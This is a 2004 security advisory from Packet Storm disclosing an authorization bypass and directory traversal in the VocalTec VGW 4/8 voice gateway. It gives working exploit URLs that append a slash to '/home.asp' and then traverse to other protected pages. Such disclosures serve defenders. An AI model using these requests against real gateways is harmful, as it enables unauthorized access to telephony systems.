vocaltec8.txt

2004-03-16T00:00:00
ID PACKETSTORM:32868
Type packetstorm
Reporter Rafel Ivgi
Modified 2004-03-16T00:00:00

Description

                                        
                                            `~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Application VocalTec Gateway  
Vendors: http://www.vocaltec.com  
Versions: 8  
Platforms: Windows  
Bug: Reverse Directory Transversal +  
Authorization Bypass  
Risk: High  
Exploitation: Remote with browser  
Date: 14 Mar 2004  
Author: Rafel Ivgi, The-Insider  
e-mail: the_insider@mail.com  
web: http://theinsider.deep-ice.com  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
1) Introduction  
2) Bugs  
3) The Code  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
===============  
1) Introduction  
===============  
  
It provides high voice quality and optimized packet voice streaming over  
managed and public  
(Internet) IP networks. Utilizing a robust, outdoor embedded platform,  
VGW4/8 ensures enhanced  
reliability and high performance.  
  
VGW4/8 enables users to make local, long distance and international  
telephone/fax calls using  
existing telephony devices. Calls originating or terminating at a VGW4/8 may  
be routed through  
a carrier providing a VoIP Virtual Private Network service or over existing  
corporate IP data networks.  
  
Product details: http://www.vocaltec.com/html/telephony/gateway_4_8.shtml  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
======  
2) Bug  
======  
  
  
Upon connecting to the server a "Basic Authorization" login is required.  
If it failes there is information disclosure :  
  
-------------------------------------------------------------  
Access Error: Unauthorized  
when trying to obtain /home.asp  
  
Access to this document requires a User ID  
-------------------------------------------------------------  
  
Accessing the given file name again requests a "Basic Authorization" login.  
By reffering to the file as a folder the authorization is bypassed.  
For Example:  
http://<host>/home.asp/  
  
Now after we have bypassed the authorization we can use Reverse Directory  
Transversal to  
access any "Basic Authorization" protected file.  
For Example:  
http://<host>/home.asp/../menu.asp  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
===========  
3) The Code  
===========  
  
http://<host>/home.asp/  
http://<host>/home.asp/../menu.asp  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
---   
Rafel Ivgi, The-Insider  
http://theinsider.deep-ice.com  
  
"Things that are unlikeable, are NOT impossible."  
`